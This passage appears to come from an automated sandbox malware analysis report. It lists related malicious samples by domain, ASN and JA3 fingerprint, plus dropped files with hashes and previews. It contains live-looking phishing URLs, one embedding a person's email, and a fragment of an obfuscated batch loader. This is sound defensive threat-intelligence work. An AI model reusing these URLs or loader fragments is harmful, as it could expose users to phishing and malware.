	SWIFTCOPY202973783.vbe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	Quotation.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.74.152
	Creal.exe	Get hash	malicious	Creal Stealer	Browse	104.26.13.205
	#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe	Get hash	malicious	Blank Grabber, Creal Stealer	Browse	104.26.12.205
gxe0.com	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat	Get hash	malicious	AgentTesla, DBatLoader	Browse	198.252.105.91
	NEOMS_EOI_FORM.cmd	Get hash	malicious	DBatLoader	Browse	198.252.105.91
	NEOMS_EOI_FORM.GZ	Get hash	malicious	DBatLoader	Browse	198.252.105.91
	New_Order_PO_GM5637H93.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse	198.252.105.91
pywolwnvd.biz	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat	Get hash	malicious	AgentTesla, DBatLoader	Browse	54.244.188.177
	AENiBH7X1q.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	54.244.188.177
	E_dekont.cmd	Get hash	malicious	DBatLoader, Nitol, PureLog Stealer, XWorm	Browse	54.244.188.177
	Y2EM7suNV5.exe	Get hash	malicious	MassLogger RAT	Browse	54.244.188.177
	AsusSetup.exe	Get hash	malicious	Unknown	Browse	54.244.188.177
	SetupRST.exe	Get hash	malicious	Unknown	Browse	54.244.188.177
	AsusSetup.exe	Get hash	malicious	Unknown	Browse	54.244.188.177
	RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	54.244.188.177
	PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	54.244.188.177
	PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	54.244.188.177

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HAWKHOSTCA	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat	Get hash	malicious	AgentTesla, DBatLoader	Browse	198.252.105.91
	NEOMS_EOI_FORM.cmd	Get hash	malicious	DBatLoader	Browse	198.252.105.91
	NEOMS_EOI_FORM.GZ	Get hash	malicious	DBatLoader	Browse	198.252.105.91
	New_Order_PO_GM5637H93.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse	198.252.105.91
	Shipping documents..exe	Get hash	malicious	FormBook	Browse	198.252.98.54
	SALARY OF OCT 2024.exe	Get hash	malicious	FormBook	Browse	198.252.98.54
	PURCHASE ORDER-6350.exe	Get hash	malicious	FormBook	Browse	198.252.106.191
	https://hy.markkasmick.click/cx/tbSgVco_akr35UznLBgMmL_dGwr4A9B_vyg2WwEB0w1LRjKjQMyEnB89mCfTRy8oqnbpdFunqinBhx0TsHvSJdUHnbksc3kdcKecoDvVHa5LAm46atMmRo3D2CHoEu2bmOqt4Ic8O_7AE7Igwgbi5c8zmZf6Fqp_XqcjREPr7609oL7vKm8FfjGLhMetr2oxtpR3ywH4BUElgc7EI7usxj8CJYEUMktwlb7YUzPvYQ7P1PilEV0LqiXI5sm6QVF4ZGl5TIXhnQLOG0kl6WQ0miiZysBfhaNojnPTUvisUUkwOp2fYTxkXEIhZ7ESJ7qXYLxQbmy4RJVeZZZ3RY5rX8W5t8cudSM9Zx7UaxgLH56aOv81v4QfUnzroT9v7LR3jPEjzYXr2LwuykYQnzvV6boWlogU4jkPE6MocRRlRoC6uUx2e1Wseo8MqGWTT2uXo4HbQDneiMF84sQ34*3TnbAxXWu8xLbb_mAOQxUTA3T5TUUZKeU3ziolM8TSVV5Y5LQTFGtNArddwJKdWCb_cLYMxUJpZ3cqM_A	Get hash	malicious	Unknown	Browse	198.252.106.147
	Z6s208B9QX.exe	Get hash	malicious	FormBook	Browse	198.252.106.191
	PURCHASE ORDER-6350.exe	Get hash	malicious	FormBook	Browse	198.252.106.191
CLOUDFLARENETUS	https://mazans.com/WEB-ID-5672849687924/zerobot?email=Francois.barbeau@staples.ca	Get hash	malicious	Captcha Phish	Browse	104.26.5.39
	https://funpresc.pe.gov.br/976823/secure-redirect/index.html#Francois.barbeau+staples.ca%20%20https://mazans.com/WEB-ID-5672849687924/zerobot?email=Francois.barbeau@staples.ca	Get hash	malicious	Captcha Phish	Browse	172.67.72.174
	E7X-XIZ5.eml	Get hash	malicious	Unknown	Browse	104.18.95.41
	Scan12112024,pdf.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	http://track.reviewmgr.com/ls/click?upn=u001.W5y-2Fhe84rCuLxXDO470nfuKD2Iz98QeQpE-2BkxRR0H-2BqB5cDKklujIJ5FLru7QrAASOSa17vR-2FSCLVAx4lWyy5Q-3D-3DkaP7_Yp4ydSxZWNatis3HtI6bBrJjg57JYwT6kbyY2f89Z-2FBhxNJZyCBl9w6yXNV0YfiKUAGjaILaAN0mF43Ydvv3aAXjCPBMrYvHXhqj-2F90M8IWSluK-2FDr0h4-2FIbAXpExZIWOjtRSKBCrpvm-2BHKZd6Q2itOPvvv8Wh8uHJq1rbQgzA8HMkQB3GP7mtgLvWqf-2F2SUC5eKSSwLqPZnnofRHoc7cSU1xfupfl4il6cb3-2BSKrTYe1odI0Jq1F3XJEtoagDhZ-2B0poPJjuweCyekPO2Y39xfy8FdwLLvVUma4NgVhDhlM-3D	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://t.ly/SjDNX	Get hash	malicious	Python Stealer, Braodo	Browse	162.159.61.3
	https://renosuperstore.ca/shop/vanities/tesoro/tesoro-smally-collection/	Get hash	malicious	Unknown	Browse	162.159.140.33
	https://complianceapps.zendesk.com/agent/tickets/383359	Get hash	malicious	Unknown	Browse	1.1.1.1
	L2G-AHW9.eml	Get hash	malicious	Unknown	Browse	104.18.95.41
	z94SolicituddecotizacionStro1268975.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
OVHFR	https://sharepoint-business.com/?rid=eprRhgr	Get hash	malicious	Unknown	Browse	51.178.43.144
	http://matomo.uk.oxa.cloud	Get hash	malicious	Unknown	Browse	51.195.180.103
	zgp.elf	Get hash	malicious	Mirai	Browse	51.222.237.206
	mNtu4X8ZyE.exe	Get hash	malicious	Emotet	Browse	51.75.33.127
	75A0VTo3z9.exe	Get hash	malicious	Emotet	Browse	46.105.114.137
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat	Get hash	malicious	AgentTesla, DBatLoader	Browse	51.195.88.199
	https://klick.publikator.se/?BREV_ID=592&EPOST=kent.isaksson@platspecialisten.se&URL=https://link.mail.tailwindapp.com/c/443/65791c056ee100f6e0b1ce0da6ffd5aaa4304af6d9041064814b00b317faceea	Get hash	malicious	HTMLPhisher	Browse	192.99.218.232
	RFQ_TFS-1508-AL NASR ENGINEERING.exe	Get hash	malicious	RedLine	Browse	193.70.111.186
	botnet.x86.elf	Get hash	malicious	Mirai, Moobot	Browse	37.187.76.119
	5r3fqt67ew531has4231.spc.elf	Get hash	malicious	Mirai, Okiru	Browse	178.32.95.230

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	https://webconference.protected-forms.com/XaGFyNXNiVFNRd1VaOFBwaER2WW5KM1V1S1NLSzZZZDhjN3NKVC9oV2lCRlNRWmVpbVlYY0JzbS81VUd0czRzOHNRWWNGSndpSCtxMm15d3h6SnFIS0VpR2NHcHh2MWo5Nm1wM3lROHdlakpZdnVWYUpHZDJ2LzVyV1ljWjZuK2pHcTByTjRWRm1IRnpPSnVmUFI0TVk2dHN5L1Yxdko0Y01WeHZYck1iM2tvc3l4YVdqSlZabWl2Y0ZwLzQtLVZvU05jS1M1U0FEQjZZeHUtLUw3WXM4dkFWa2t2YTRLMXJEYTRIbGc9PQ==?cid=2270944670	Get hash	malicious	KnowBe4	Browse	104.26.13.205
	HvOPtSE7cm.dll	Get hash	malicious	ElizaRAT	Browse	104.26.13.205
	Scan12112024,pdf.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.26.13.205
	9LrEuTWP8s.exe	Get hash	malicious	Meduza Stealer, PureLog Stealer, RedLine, zgRAT	Browse	104.26.13.205
	HAeAec7no3.exe	Get hash	malicious	Meduza Stealer, PureLog Stealer, RedLine, zgRAT	Browse	104.26.13.205
	EUFOvMxM2H.exe	Get hash	malicious	Meduza Stealer, PureLog Stealer, RedLine, zgRAT	Browse	104.26.13.205
	https://customization-connect-7617.my.salesforce.com/sfc/p/d3000000Byor/a/d300000000RR/ML8ajzoJU6aJIvGQZGZ6S9rRHpaD1XaytKzcNGEf56g	Get hash	malicious	HTMLPhisher	Browse	104.26.13.205
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	104.26.13.205
	Booking_0731520.vbe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	https://shorten.is/meta_copyright_support_teamt5256	Get hash	malicious	Unknown	Browse	104.26.13.205
a0e9f5d64349fb13191bc781f81f42e1	Scan12112024,pdf.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	198.252.105.91
	Booking_0731520.vbe	Get hash	malicious	AgentTesla	Browse	198.252.105.91
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	198.252.105.91
	Payment advice_USD75,230.18.xls	Get hash	malicious	Unknown	Browse	198.252.105.91
	Scan12112024,pdf.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	198.252.105.91
	file.exe	Get hash	malicious	LummaC	Browse	198.252.105.91
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	198.252.105.91
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	198.252.105.91
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	198.252.105.91
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	198.252.105.91

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\Public\Libraries\lxsyrsiW.pif	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat	Get hash	malicious	AgentTesla, DBatLoader	Browse
	NEOMS_EOI_FORM.cmd	Get hash	malicious	DBatLoader	Browse
	NEOMS_EOI_FORM.GZ	Get hash	malicious	DBatLoader	Browse
	r876789878767.cmd	Get hash	malicious	DBatLoader, FormBook	Browse
	2tKeEoCCCw.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse
	New_Order_PO_GM5637H93.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse
	E_dekont.cmd	Get hash	malicious	DBatLoader, Nitol, PureLog Stealer, XWorm	Browse
	z1Transaction_ID_REF2418_cmd.bat	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse
	z1SWIFT_MT103_Payment_552016_cmd.bat	Get hash	malicious	DBatLoader, FormBook	Browse
	Order Specifications for Materials.docx.vbs	Get hash	malicious	DBatLoader, FormBook	Browse

Created / dropped Files

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Download File

Process:	C:\Users\Public\Libraries\lxsyrsiW.pif
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1290240
Entropy (8bit):	5.277769683130694
Encrypted:	false
SSDEEP:	12288:mImGUcsvZZdubv7hfl3/Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wlb:mxGBcmlPsqjnhMgeiCl7G0nehbGZpbD
MD5:	C151F3A6FA9381DA97B91A261FDFFF5A
SHA1:	0AE76EDB1F584976C9961BECEE210E15EFFEFF9E
SHA-256:	C393F090F2D2950341BAF2D670F12AA109268AE827BC777CD49C3D30FB7D93D0
SHA-512:	E8E9896AF5890EC3BBB8BD10D49C7B66B93A482ACE0D0C303B8E2B58BC98880FF70AA8207C08884FCFDF879EC26147CA1DAA097940B744F66C57C1DE3A113334
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@..................................#......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...`.......P...`..............@...........................................................................................................................................................................................................................................................

C:\Users\Public\Libraries\PNO

Download File

Process:	C:\Users\user\AppData\Local\Temp\x.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:gov:gov
MD5:	D17B8377F66273771CD3B5165F393561
SHA1:	4218581488233698A293E3BF395DEA242601910A
SHA-256:	BAD8A8C24E18664287F4F20CB8DE2B089525D51F939C537B471F2D273FB66F3F
SHA-512:	38C9C49E34D4057CC084BABB9791E603F81AB0CB64E1973896C3615CD18B09B26E2375EE273B7D7180DE98A9369F71A63783E55CC1C854BF7B08939E82DE85DB
Malicious:	false
Preview:	76..

C:\Users\Public\Libraries\Wisrysxl

Download File

Process:	C:\Users\user\AppData\Local\Temp\x.exe
File Type:	data
Category:	dropped
Size (bytes):	1855488
Entropy (8bit):	7.397962752825014
Encrypted:	false
SSDEEP:	49152:uFLsbSRbR4KUHq/dhv95pz9P8/P/lUtAQXI53D7/vwpU19uyXABAtIFBZ:ULhRGYHKOBZ
MD5:	1A67EDB62C0400F2AC88DAFB6F2E6047
SHA1:	757301130500E1E316FE7CA00FD44EB4049117AA
SHA-256:	0F2B642FB051D99109789C0F6C714E411EB5C6CC7E791D76801DBB8E7B3FB486
SHA-512:	5795F1308E542213D556D13FB8DE321E263EE1723D964A7E10997CA9211086476FC509E264C4092305EB6D288DC7EA39AC1ED1F441D0B5F880F8D60461829EEF
Malicious:	true
Preview:	...Y#..K..&$..'.#'...%.... %" ...... ..&.....&..$"%.#$'#....'...... '%.%!... .%.''"". "#".%..&.&........%........."!...#'....Y#..K.. .& %.. ...Y#..K.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j.........P.O..."..../....8....\..%.

C:\Users\Public\Libraries\Wisrysxl.PIF

Download File

Process:	C:\Windows\SysWOW64\esentutl.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1081856
Entropy (8bit):	6.9272903664814445
Encrypted:	false
SSDEEP:	24576:BJSK4Kavab3wMeAOr6ZFlR+gKT44VoIOL7zk:7K1WYL6L
MD5:	31BC6907D6097A76BB1DD891CFC09B7A
SHA1:	97340CA203A1207E492135D580C6860A724A227F
SHA-256:	F711703C8BA66DCEDB8E4B83F21A0425C528E278242C852FD5CF54BB43E30454
SHA-512:	6C217FA37CC4C655CDA0A2A491E49AC736E4940027178B3C7D6488D296923D40CC26A4D0142052B94B58491FA90F17AB3F4115CB0C75EFE09175E732D62DBBF5
Malicious:	true
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................0...N......\G.......P....@.......................... ...................@..............................6%..............................0r..................................................................................text....&.......(.................. ..`.itext.......@.......,.............. ..`.data........P.......4..............@....bss.....6...p.......R...................idata..6%.......&...R..............@....tls....4............x...................rdata...............x..............@..@.reloc..0r.......t...z..............@..B.rsrc...............................@..@............. ......................@..@................................................................................................

C:\Users\Public\Libraries\lxsyrsiW.cmd

Download File

Process:	C:\Users\user\AppData\Local\Temp\x.exe
File Type:	DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
Category:	dropped
Size (bytes):	62357
Entropy (8bit):	4.705712327109906
Encrypted:	false
SSDEEP:	768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
MD5:	B87F096CBC25570329E2BB59FEE57580
SHA1:	D281D1BF37B4FB46F90973AFC65EECE3908532B2
SHA-256:	D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
SHA-512:	72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
Malicious:	false
Preview:	@echo off..@echo off..@%.......%e%..%c%...%h%.... ...%o%........% %.%o%.....%f%...%f% ........%..s%.%e%.... %t%r.o......% %....%"%.........%l%.......o.%V%......%W%.....o%a%..........%=%.o....%s%. .o%e%. ....... %t%.% %..%"%.r%..%lVWa%"%......%u%. .%p%.%w%.... %u%.... o...%=%..... %=%... . . %"%.%..%lVWa%"%....%R%.%b%. .... %U%. %p%.%z%...%n% ...%n%...%f%..... . ..%W%.......%i%......%%upwu%C%. .. %l%...%o%........%a%......%"% .... %..%lVWa%"% %r%......%M%....%S%...r... ..%o%....... .%w%.....%X%.....rr%I%..... .

C:\Users\Public\Libraries\lxsyrsiW.pif

Download File

Process:	C:\Users\user\AppData\Local\Temp\x.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	68096
Entropy (8bit):	6.328046551801531
Encrypted:	false
SSDEEP:	1536:lR2rJpByeL+39Ua1ITgA8wpuO5CU4GGMGcT4idU:lR2lg9Ua1egkCU60U
MD5:	C116D3604CEAFE7057D77FF27552C215
SHA1:	452B14432FB5758B46F2897AECCD89F7C82A727D
SHA-256:	7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
SHA-512:	9202A00EEAF4C5BE94DE32FD41BFEA40FC32D368955D49B7BAD2B5C23C4EBC92DCCB37D99F5A14E53AD674B63F1BAA6EFB1FEB27225C86693EAD3262A26D66C6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:	Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat, Detection: malicious, Browse Filename: NEOMS_EOI_FORM.cmd, Detection: malicious, Browse Filename: NEOMS_EOI_FORM.GZ, Detection: malicious, Browse Filename: r876789878767.cmd, Detection: malicious, Browse Filename: 2tKeEoCCCw.exe, Detection: malicious, Browse Filename: New_Order_PO_GM5637H93.cmd, Detection: malicious, Browse Filename: E_dekont.cmd, Detection: malicious, Browse Filename: z1Transaction_ID_REF2418_cmd.bat, Detection: malicious, Browse Filename: z1SWIFT_MT103_Payment_552016_cmd.bat, Detection: malicious, Browse Filename: Order Specifications for Materials.docx.vbs, Detection: malicious, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....8.......................p....................@.............................................. ...................p.......`...............................................................P.......................................................text............................... ..`.data....p.......0..................@....tls.........@......................@....rdata.......P......................@..P.idata.......`......................@..@.edata.......p......................@..@

C:\Users\Public\Wisrysxl.url

Download File

Process:	C:\Users\user\AppData\Local\Temp\x.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Wisrysxl.PIF">), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	104
Entropy (8bit):	5.094576921115185
Encrypted:	false
SSDEEP:	3:HRAbABGQYmTWAX+rSF55i0XM6tZsbxESdbuA8ovn:HRYFVmTWDyzPtZExEUbP8y
MD5:	0ABEA770C4DAE137972E544E2A8E832E
SHA1:	8E11A1C82EDE558F8338064A456087A64C8FED8C
SHA-256:	83F80BAFC9E20708ECD18BF4A5B442127C8D42CEB968CD743FAC09B5F273CABD
SHA-512:	B2A49E6D3EA4EC2EB0D8D9D39F4AC1BD8BF0270E1817424B8FD2FAE6EDBFD630D88844C3F73A4BD5AA0CA5CDA9FD3EC35D07A3E840DE0F29CF1CEE9050E6EDAB
Malicious:	true
Preview:	[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Wisrysxl.PIF"..IconIndex=954764..HotKey=85..

C:\Users\Public\alpha.pif

Download File

Process:	C:\Windows\SysWOW64\esentutl.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	236544
Entropy (8bit):	6.4416694948877025
Encrypted:	false
SSDEEP:	6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
MD5:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
SHA1:	4048488DE6BA4BFEF9EDF103755519F1F762668F
SHA-256:	4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
SHA-512:	80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.l.J.?.J.?.J.?.2(?.J.?.!.>.J.?.!.>.J.?.J.?.K.?.!.>.J.?.!.>.J.?.!.>.J.?.!D?.J.?.!.>.J.?Rich.J.?................PE..L....~.............................. k............@..................................j....@.................................................................p...%...5..T............................................................................text............................... ..`.data...8...........................@....idata...$.......&..................@..@.didat..H...........................@....rsrc...............................@..@.reloc...%...p...&...v..............@..B................................................................................................................................................................................................................................................................................

C:\Users\Public\xpha.pif

Download File

Process:	C:\Windows\SysWOW64\esentutl.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18944
Entropy (8bit):	5.742964649637377
Encrypted:	false
SSDEEP:	384:PVhNH/TqNcx+5tTAjtn3bPcPwoeGULZbiWBlWjVw:PVhZXx+5tTetLVohULZJgw
MD5:	B3624DD758CCECF93A1226CEF252CA12
SHA1:	FCF4DAD8C4AD101504B1BF47CBBDDBAC36B558A7
SHA-256:	4AAA74F294C15AEB37ADA8185D0DEAD58BD87276A01A814ABC0C4B40545BF2EF
SHA-512:	C613D18511B00FA25FC7B1BDDE10D96DEBB42A99B5AAAB9E9826538D0E229085BB371F0197F6B1086C4F9C605F01E71287FFC5442F701A95D67C232A5F031838
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.[...5]..5]..5]..]'.5]..0\..5]..6\..5]..1\..5]..4]Q.5]..4\..5]..=\..5]...]..5]..7\..5]Rich..5]................PE..L....$Z.....................2......P4.......@....@..................................c....@...... ..........................`a..\|....p.. ...............................T............................................`..\............................text....)......................... ..`.data........@......................@....idata.......`.......0..............@..@.rsrc... ....p.......<..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TrojanAIbot.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	410
Entropy (8bit):	5.361827289088002
Encrypted:	false
SSDEEP:	12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
MD5:	64A2247B3C640AB3571D192DF2079FCF
SHA1:	A17AFDABC1A16A20A733D1FDC5DA116657AAB561
SHA-256:	87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
SHA-512:	CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\server_BTC.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	410
Entropy (8bit):	5.361827289088002
Encrypted:	false
SSDEEP:	12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
MD5:	64A2247B3C640AB3571D192DF2079FCF
SHA1:	A17AFDABC1A16A20A733D1FDC5DA116657AAB561
SHA-256:	87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
SHA-512:	CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380285623575084
Encrypted:	false
SSDEEP:	48:+WSU4xympjgs4Rc9tEoUl8NPZHUl7u1iMuge//MM0Uyus:+LHxvCsIcnSKRHmOugA1s
MD5:	6BCA4D958C56F3AA2AD1B08D09E024BE
SHA1:	3B3089EE55BBAC06860C3B0FA656268B2409630A
SHA-256:	55B152600E01B1C79F985FA2CB0818CFEA077E7E655F4C5E34F794502C79BB52
SHA-512:	F5825D054803A4505AD8A015F29D11717E571BBF7BB8EC9050AB8D08414992AE569AB4301D53FD9D71BC01B38674CF533D99EAEA8C6E9E53B036C29B63449BE1
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<...............V.}...@...i...........System.Transactions.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4bo53ipb.2wp.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bzqa24ub.va0.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_puh5zjj0.4kz.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
